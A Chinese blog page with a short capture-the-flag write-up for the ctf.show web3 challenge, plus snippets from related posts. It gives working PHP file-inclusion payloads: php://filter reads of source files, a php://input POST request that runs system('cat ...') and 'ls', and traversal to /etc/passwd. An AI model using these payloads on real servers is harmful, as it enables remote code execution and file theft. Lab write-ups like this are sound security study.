ctf.show web3 php伪协议

最新推荐文章于 2025-03-24 18:02:04 发布

Gruzz咕噜咕噜

最新推荐文章于 2025-03-24 18:02:04 发布

阅读量1.9k

点赞数

分类专栏： CTF 文章标签： web安全 php

本文链接：https://blog.youkuaiyun.com/qq_53319483/article/details/124325693

版权

CTF 专栏收录该内容

5 篇文章

订阅专栏

这篇博客探讨了PHP代码中的安全漏洞，通过示例展示了如何利用GET和POST方法进行恶意操作，如使用PHP的system函数执行命令。文章还提到了HTTP头部篡改和基础的网络攻防知识。

摘要生成于 C知道，由 DeepSeek-R1 满血版支持，前往体验 >

GET方法 ?url=php://filter/read=convert.base64-encode/resource=ctf_go_go_go

POST方法抓包改首行和尾行

POST /index.php?url=php://input HTTP/1.1

Host:

User-Agent:

Accept-Encoding:

Upgrade-Insecure-Requests:

<?PHP system("cat ctf_go_go_go");?>

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

Gruzz咕噜咕噜

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

专栏目录

ctfshow web3

weixin_51866363的博客

11-20

4641

** ## **ctfshow web3** 这一道题就不像web2那么简单了，不过在借助web安全神器burpsuite的情况下还是比较容易的。接下来就来说明一下这道题的解法以及浅显地介绍一下burp工具的使用吧！！！看到这道题目提示我们可以知道这是一道php伪协议+文件包含漏洞的题目，先进行测试看看能不能通过 file:////etc/pas...

ctf.show web3 文件包含+php伪协议+命令执行

m0_46412682的博客

07-12

2434

ctf.show web3 php伪协议+文件包含+命令执行题目的提示：一开始的页面：看到这个语句，那就是文件包含了，先试下file:////etc/passwd,有反应试下有没有flag.txt文件，好像没有这个文件那现在我们利用php伪协议 php://input post提交命令，这里不知道为什么我用hackerbar post提交没有反应，那只能burp抓包咯，利用命令执行 ls，查看当前有啥文件这里出现了一个ctf_go_go_go,那我们用cat打开 flag{a1b1cd4e-

参与评论您还未登录，请先登录后发表或查看评论

ctf.show web3

m0_63028223的博客

04-25

1587

打开题目，出现提示，php文件？，考虑文件包含漏洞。输入参数：?url=/etc/passwd 这个报错界面出来了，说明存在文件包含漏洞构造url值 =php://input 使用php协议使用burp抓包使用ls命令查看php下的文件得到文件路径。。。。使用cat方法查看最终得到flag。。。。。。。。发文助手检测到文字太少，无奈再说点什么吧，信息安全渗透，学习需要一个积累的过程，需要可以不精通但最少了解 php，java，j...

ctfshow WEB web3

热门推荐

wangyuxiang946的博客

08-19

2万+

ctf.show WEB模块的第3关是一个文件包含漏洞,include()函数包含的文件会被执行,我们使用PHP伪协议配合抓包工具进行命令执行,从而获取flag 这一关的flag就存放在网站跟路径下的文件中 php://input可以访问请求的原始数据,配合文件包含漏洞可以将post请求体中的内容当做文件内容执行,enctype=multipart/form-data"时,php:/input将会无效页面中显示了部分源码,明显是引导我们利用文件包含漏洞进行操作,源码中的inc...

ctfshow_web3

qq_45891669的博客

04-27

878

CTFshow_web3 关于CTFshow_web3解题步骤：打开容器可以看到一小段php代码，可以看出是文件包含，可能涉及文件包含漏洞，可以拿 ?url=../../../../../../../../../../etc/passwd 去测试一下，看有没有文件包含漏洞测试成功确认存在php文件包含漏洞可以使用Burpsuit去抓包,并且使用php伪协议中的php://input来在包的最下面写上<?php system("ls");?>执行系统命令查看当前目录的文件，看看有没有fl

ctf.show web 8 sql注入过滤了‘

m0_46412682的博客

07-14

1108

ctf.show web 8 sql注入过滤了’ 开始的页面提示是sql注入，第一步先试下 ’ or 1=1# 提示sql注入错误第二步试下/**/替代空格，还是错误第三步，去掉’单引号，成功，说明过滤了单引号查看有多少字段，1/**/or/**/1=1/**/union/**/select/**/1,2,3#，但是这里又提示sql错误，这里可能过滤了select和union关键字上脚本，这的脚本是网上找的 import requests s=requests.session() url='h

ctf.show之SSRF漏洞

weixin_68477635的博客

10-14

388

SSRF全称为Server-side Reques Fogery,中文含义为服务器端请求构造，漏洞产生的原因是服务端提供了能够从其他服务器应用获取数据的功能，比如从指定的URL地址获取网页内容，加载指定地址的图片、数据、下载等等。

[CTF_网络安全] 攻防世界 Web_php_include 解题详析(php伪协议、data伪协议、file伪协议)

2401_84208172的博客

05-24

2284

[CTF_网络安全] 攻防世界 Web_php_include 解题详析(php伪协议、data伪协议、file伪协议)，该题考察文件包含漏洞，涉及PHP伪协议data伪协议file伪协议及PHP内置函数等知识点，希望读者躬身实践。黑客&网络安全如何学习。

ctf.show之命令执行

weixin_68477635的博客

09-26

218

web29 : 命令执行，需要严格的过滤

ctfshow-web（三）

qq_47804678的博客

12-06

1061

这个打开就是一段代码：不太会php，查了一下，知道了：assert（）是一个断言函数，如果条件判断错误会终止程序；die() 函数输出一条消息，并退出当前脚本。然后还有一个intval（）函数，他是用来获取变量的整数值。其实可以看出来，有两个对num值的判断，且都要为真才能达到flag，那么就可以利用intval()函数的一些特点进行绕过。这里利用的是加法绕过：intval（）函数中用字符串方式表示科学计数法时，函数的返回值是科学计数法前面的一个数，而对于科学计数法加数字则会返回科学计数法的数值；也就是说

菜鸡的web之旅 ctfshow web3

Lig_HossssT的博客

10-27

573

php伪协议+文件包含+命令执行掏出burpsuite 还没学php 看dalao的wp跟着做的第一次用burpsuite = = 捣鼓了好久

CTFshow：WEB3

精神大火的博客

03-25

1693

进入题目链接，观察到页面展示了部分源码，为PHP语言，查询得知其中include函数涉及文件包含漏洞。随着网站业务的需求，程序开发人员一般希望代码更灵活，所以将被包含的文件设置为变量，用来进行动态调用，但是正是这种灵活性通过动态变量的方式引入需要包含的文件时，用户对这个变量可控而且服务端又没有做合理的校检或者校检被绕过就造成了。：当使用该函数包含文件时，只有代码执行到include()函数时才将文件包含进来，发生错误时之给出一个警告，然后继续向下执行。可通过php伪协议进行包含PHP伪协议。

ROSE笔记-ctf.show_web3-WP

居上

11-05

592

ctf.show_web3 根据提示，判断类型为文件包含 payload：/?url=php://input，然后用burpsuite抓包在请求body里写上 <?php system("ls")?> 查看一些当前目录下文件出现名为ctf_go_go_go的文件继续在请求头中写入 <?php system("cat ctf_go_go_go")?> 得到flag ...

CTFshow WEB入门 web3

m0_73912575的博客

10-25

338

CTF.show WEB入门--web3 题解write up

刷题之旅第23站,CTFshow web3

cc菜的一批

02-16

1497

感谢ctf show平台提供题目使用php伪协议 + include, 实现执行任意命令。 <?php system('ls');?> 获取flag <?php system('cat ctf_go_go_go');?> 原创文章不易，点个赞再走吧。 ...

CTFshow web-web3 WP

qq_45427131的博客

05-11

758

CTFshow Web-Web3 文件包含+命令执行（伪协议） Php://filter/read=convert.base64-encode/resource=文件名用php伪协议读取经过base64加密之后的文件 php://input php://input可以访问请求的原始数据的只读流，将请求的数据当作php代码执行。当传入的参数作为文件名打开时，可以将参数设为php://input,同时post想设置的文件内容，php执行时会将post内容当作文件内容。注：当enctype=”multipa

Ctf.show-web3复盘

weixin_54894046的博客

05-17

522

目录重点看这个正则匹配你问我为啥知道是前面的\\导致后面的|\* 匹配不到？我们可以做下一个实验然后我们来做一下题目 <html> <head> <title>ctf.show萌新计划web1</title> <meta charset="utf-8"> </head> <body> <?php # 包含数据库连接文件 include("config.php"); # 判断get..

ctf.show_web5

10-22

ctf.show_web5是一个CTF比赛中的WEB模块第5关，需要传递两个参数v1和v2，要求v1必须是纯字母字符串，v2必须是数字或数字字符串，并且两个参数的md5值必须相等。可以利用md5的0e漏洞进行绕过。具体来说，可以构造一个...